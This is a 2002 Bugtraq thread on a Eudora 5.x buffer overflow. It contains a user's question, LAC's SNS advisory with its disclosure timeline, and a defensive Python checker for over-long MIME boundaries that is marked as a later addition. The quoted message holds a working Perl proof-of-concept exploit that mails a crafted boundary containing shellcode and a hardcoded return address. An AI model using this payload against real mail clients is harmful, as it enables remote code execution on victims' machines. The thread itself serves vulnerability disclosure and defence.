Bugtraq mailing list archives

Re: [SNS Advisory No.55] Eudora 5.x for Windows Buffer Overflow Vulnerability


From: Steven Michaud <smch () midway uchicago edu>
Date: Fri, 9 Aug 2002 21:19:17 -0500 (CDT)

It's not too surprising that this exploit doesn't work on English
Windows 2000 Pro, with or without SP2.  But I can't even get it to
crash Eudora (5.1 or 5.1.1) unless I open the hacked message,
right-click on it, and feed it through the "Unwrap Text" plugin.

Has anyone ported this exploit to English Windows 2000?  If so, when
is the exploit triggered?  (In the preview pane?  When you open the
message?  Under some other circumstances?)

Likewise, when is the exploit triggered on Japanese Windows 2000 Pro?

Thanks in advance!

On Tue, 6 Aug 2002, Kanatoko wrote:


This is a proof of concept exploit for Eudora 5.x buffer overflow.

Tested on:
  Japanese Windows 2000 Professional SP2
  Eudora Version 5.0.2-Jr2


#!/usr/local/bin/perl

#---------------------------------------------------------------------
# Eudora Version 5.0.2-Jr2 exploit for Japanese Windows 2000 Pro (SP2)
# written by Kanatoko <anvil () jumperz net>
# http://www.jumperz.net/
#---------------------------------------------------------------------

use Socket;

$connect_host   = 'mail.jumperz.net';
$port           = 25;
$env_from       = 'anvil () jumperz net';
$env_to         = 'target () jumperz net';
$from           = 'anvil () jumperz net';
$to             = 'target () jumperz net';

$iaddr = inet_aton($connect_host) || die "Host Resolve Error.\n";
$sock_addr = pack_sockaddr_in($port,$iaddr);
socket(SOCKET,PF_INET,SOCK_STREAM,0) || die "Socket Error.\n";
connect(SOCKET,$sock_addr) || die "Connect Error\n";
select(SOCKET); $|=1; select(STDOUT);

        #egg written by UNYUN (http://www.shadowpenguin.org/)
        #57bytes
$egg  = "\xEB\x27\x8B\x34\x24\x33\xC9\x33\xD2\xB2";
$egg .= "\x0B\x03\xF2\x88\x0E\x2B\xF2\xB8\xAF\xA7";
$egg .= "\xE6\x77\xB1\x05\xB2\x04\x2B\xE2\x89\x0C";
$egg .= "\x24\x2B\xE2\x89\x34\x24\xFF\xD0\x90\xEB";
$egg .= "\xFD\xE8\xD4\xFF\xFF\xFF";
$egg .= "notepad.exe";

$buf  = "\x90" x 121;
$buf .= $egg;
$buf .= "\xEB\xA0"; #JMP -0x60
$buf .= "A" x 2;
$buf .= "\x97\xAC\xE3\x77"; #0x77e3ac97 JMP EBX in user32.dll

$hoge = <SOCKET>;
print SOCKET "HELO hoge\x0D\x0A";
$hoge = <SOCKET>;
print SOCKET "MAIL FROM:<$env_from>\x0D\x0A";
$hoge = <SOCKET>;
print SOCKET "RCPT TO:<$env_to>\x0D\x0A";
$hoge = <SOCKET>;
print SOCKET "DATA\x0D\x0A";
$hoge = <SOCKET>;

print SOCKET << "_EOD_";
MIME-Version: 1.0\x0D
From: $from\x0D
To: $to\x0D
Content-Type: multipart/mixed; boundary="$buf"\x0D
\x0D
.\x0D
_EOD_
$hoge = <SOCKET>;
print SOCKET "QUIT\x0D\x0A";
$hoge = <SOCKET>;


--
Kanatoko  <anvil () jumperz net>
JUMPER : http://www.jumperz.net/(Japanese)


On Mon, 05 Aug 2002 15:24:25 +0900
snsadv () lac co jp wrote:

----------------------------------------------------------------------
SNS Advisory No.55
Eudora 5.x for Windows Buffer Overflow Vulnerability

Problem first discovered: 6 Jun 2002
Published: 5 Aug 2002
----------------------------------------------------------------------

Overview:
---------
  Eudora 5.x for Windows contains a buffer overflow vulnerability,
  which could allow a remote attacker to execute arbitrary code.

Problem Description:
--------------------
  Eudora, developed and distributed by QUALCOMM Inc.
  (http://www.qualcomm.com/), is a Mail User Agent running on Windows
  95/98/2000/ME/NT 4.0 and MacOS 8.1 or later.

  The buffer overflow occurs when Eudora receives a message using a long
  string as a boundary, which is used to divide a multi-part message into
  separate parts.  In our verification environment, we have found that
  this could allow arbitrary commands to be executed.

Tested Version:
---------------
  Eudora 5.0-J for Windows (Ver.5.0.2-Jr2 trial) [Japanese]
  Eudora 5.1.1 for Windows (Sponsored Mode) [English]

Tested OS:
----------
  Microsoft Windows 2000 Professional SP2 [Japanese]
  Microsoft Windows 98 SE [Japanese]

Solution:
---------
  The problem will be fixed in the next release of Eudora.
  The vendor has not reported when the next release will be available.

Communication background:
-------------------------
 6 Jun 2002  : We discovered the vulnerability.
 6 Jun 2002  : We reported the findings to Livin' on the EDGE Co., Ltd.
               (user support of the Japanese version).
 14 Jun 2002 : The findings were reported again to Livin' on the EDGE Co.,
               Ltd.
 17 Jun 2002 : We contacted QUALCOMM Inc.
 18 Jun 2002 : QUALCOMM Inc. sent a reply stating that they had started an
               investigation of the problem.
 3 Jul 2002  : We asked QUALCOMM Inc. about the progress of the
               investigation.
 19 Jul 2002 : We asked QUALCOMM Inc. again about the progress of the
               investigation.
 24 Jul 2002 : We informed QUALCOMM Inc. about the announcement schedule
               of this advisory.
 25 Jul 2002 : QUALCOMM Inc. reported that this problem will be fixed in
               the next release.
 5 Aug 2002  : We decided to disclose this vulnerability due to concern
               over the potential consequences this issue may cause.
               Livin' on the EDGE Co., Ltd. has not provided any comments
               on this issue as of August 5, 2002.

Discovered by:
--------------
  Nobuo Miwa (LAC / n-miwa () lac co jp)

Disclaimer:
-----------
  All information in these advisories is subject to change without
  advance notice or mutual consensus, and each of them is released as it
  is. LAC Co., Ltd. is not responsible for any risks or occurrences caused
  by applying this information.

------------------------------------------------------------------
SecureNet Service(SNS) Security Advisory <snsadv () lac co jp>
Computer Security Laboratory, LAC  http://www.lac.co.jp/security/
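A defender-side check for the trigger the advisory describes (an over-long multipart boundary), added here as an example and not part of the thread or of any Eudora or LAC code: it parses the top-level Content-Type header and rejects boundaries outside the 70-character limit and character set of RFC 2046, so a mail gateway can quarantine such messages before a vulnerable client parses them. The sample messages and the example.invalid addresses are constructed; the oversized sample copies only the length of the PoC boundary, not its contents.

```python
"""Gateway check for over-long or malformed MIME boundary parameters.
RFC 2046 5.1.1 allows 1..70 characters from a small "bchars" set and no
trailing space; a compliant mailer never needs more, so longer boundaries
are either broken or hostile and can be quarantined at the gateway."""
import re

MAX_BOUNDARY_LEN = 70
BCHARS = set("0123456789abcdefghijklmnopqrstuvwxyz"
             "ABCDEFGHIJKLMNOPQRSTUVWXYZ'()+_,-./:=? ")
# boundary="quoted" or boundary=bare-token; parameter name is case-insensitive
_BOUNDARY_RE = re.compile(rb'boundary\s*=\s*(?:"([^"]*)"|([^\s;]+))', re.I)


def _unfolded_headers(raw: bytes) -> bytes:
    """Return the header block with RFC 2822 line folding undone."""
    sep = b"\r\n\r\n" if b"\r\n\r\n" in raw else b"\n\n"
    return re.sub(rb"\r?\n[ \t]+", b" ", raw.split(sep, 1)[0])


def extract_boundary(raw: bytes):
    """Boundary parameter of the top-level Content-Type header, or None."""
    for line in _unfolded_headers(raw).split(b"\n"):
        if line.lower().startswith(b"content-type:"):
            m = _BOUNDARY_RE.search(line)
            if m:
                return m.group(1) if m.group(1) is not None else m.group(2)
    return None


def check_boundary(raw: bytes):
    """Return (verdict, reason); verdict is 'none', 'ok' or 'reject'."""
    b = extract_boundary(raw)
    if b is None:
        return "none", "no multipart boundary parameter"
    if not 1 <= len(b) <= MAX_BOUNDARY_LEN:
        return "reject", f"boundary length {len(b)} outside 1..{MAX_BOUNDARY_LEN}"
    bad = {c for c in b if chr(c) not in BCHARS}   # bytes >= 0x80 fail too
    if bad or b.endswith(b" "):
        return "reject", f"disallowed bytes {sorted(bad)} or trailing space"
    return "ok", f"boundary length {len(b)} within RFC 2046 limits"


# Constructed sample messages (not real traffic); the second one mirrors only
# the 186-byte length of the PoC boundary in this thread, not its bytes.
BENIGN_MSG = (b"From: a@example.invalid\r\nTo: b@example.invalid\r\n"
              b"Content-Type: multipart/mixed;\r\n boundary=\"----=_Part_0001\"\r\n"
              b"\r\n------=_Part_0001\r\n")
OVERSIZED_MSG = (b"From: a@example.invalid\r\nTo: b@example.invalid\r\n"
                 b"Content-Type: multipart/mixed; boundary=\"" + b"A" * 186 +
                 b"\"\r\n\r\n.\r\n")
```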